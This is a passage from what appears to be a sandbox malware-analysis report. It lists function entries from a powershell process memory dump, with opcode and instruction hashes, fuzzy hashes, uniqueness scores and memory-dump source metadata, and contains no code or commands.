      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
      • Instruction ID: 30a261ccaf22eddbf86df1ef5616b92b20de0ccf988d10e007c5058341de2420
      • Opcode Fuzzy Hash: 5921e71f07582a7c74abfbbba3be25ad186edaa7760d03d5a8c8591150ec97b9
      • Instruction Fuzzy Hash: 1601A77110CB0C4FD744EF0CE451AA6B3E0FB95320F10052EE58AC32A1DB36E881CB46
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D277E Relevance: .0, Instructions: 47COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 387924f6cd693b7a1eb133ec0b78adc1014076e667db0cb0f35d581317211d75
      • Instruction ID: d6a37099d8dd2e5758449cd8ddabb1e6e0a3af62604b1194a076b8e444486385
      • Opcode Fuzzy Hash: 387924f6cd693b7a1eb133ec0b78adc1014076e667db0cb0f35d581317211d75
      • Instruction Fuzzy Hash: 8DF0E93276CA084FDB5C9A0CE8529B573D1E789320B54017FE48FC3296EC26BC43C685
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D2DBD Relevance: .0, Instructions: 44COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 23699e0439639eea47b346e91dd0a06d1f21f8eb79b9a81fe6b41ae115689061
      • Instruction ID: 1abf6f1882568ecd202cafaf9028caeb42f520a84db74756c74f57704f33ecf0
      • Opcode Fuzzy Hash: 23699e0439639eea47b346e91dd0a06d1f21f8eb79b9a81fe6b41ae115689061
      • Instruction Fuzzy Hash: E7F0547271CB444FD75CDA0CE8429B573D1E796334B50022EF08BC66A7EA22F8438746
      Uniqueness

      Uniqueness Score: -1.00%

      Function 00007FFDC87D2792 Relevance: .0, Instructions: 41COMMON
      Download Yara Rule
      Memory Dump Source
      • Source File: 00000001.00000002.794583917.00007FFDC87D0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFDC87D0000, based on PE: false
      Joe Sandbox IDA Plugin
      • Snapshot File: hcaresult_1_2_7ffdc87d0000_powershell.jbxd
      Similarity
      • API ID:
      • String ID:
      • API String ID:
      • Opcode ID: 1441ac77bf44b11642f57b770ad2c6ee8238e37d4d7da8b8f90e62f76c82a6f9
      • Instruction ID: 165c3b005fb68cbedd6a4d02f5a9c96e29349d52166cec0d61632ce5426e62ab
      • Opcode Fuzzy Hash: 1441ac77bf44b11642f57b770ad2c6ee8238e37d4d7da8b8f90e62f76c82a6f9
      • Instruction Fuzzy Hash: 9AF0303276C6084FD70C9A0CF8839F573D1E78A234B40026FE48BC2656E816B8438685
      Uniqueness

      Uniqueness Score: -1.00%